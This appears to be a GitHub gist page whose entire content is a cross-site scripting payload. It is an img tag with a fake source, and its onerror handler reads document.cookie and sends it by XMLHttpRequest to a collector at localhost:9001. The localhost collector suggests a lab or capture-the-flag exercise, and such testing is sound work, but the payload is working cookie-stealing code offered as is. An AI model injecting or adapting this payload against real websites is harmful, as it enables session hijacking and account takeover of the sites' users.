Skip to content

Instantly share code, notes, and snippets.

@vxermx
Created March 14, 2020 23:22
Show Gist options
  • Select an option

  • Save vxermx/b1833e23cfb4f349566aa2b5adaf2c4c to your computer and use it in GitHub Desktop.

Select an option

Save vxermx/b1833e23cfb4f349566aa2b5adaf2c4c to your computer and use it in GitHub Desktop.
<img
src='/fake'
onerror="if (document.cookie!=='teehee' && document.cookie !== '') {var xhr = new XMLHttpRequest(); xhr.open('GET', 'http://localhost:9001/'+document.cookie); xhr.send();}"
/>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment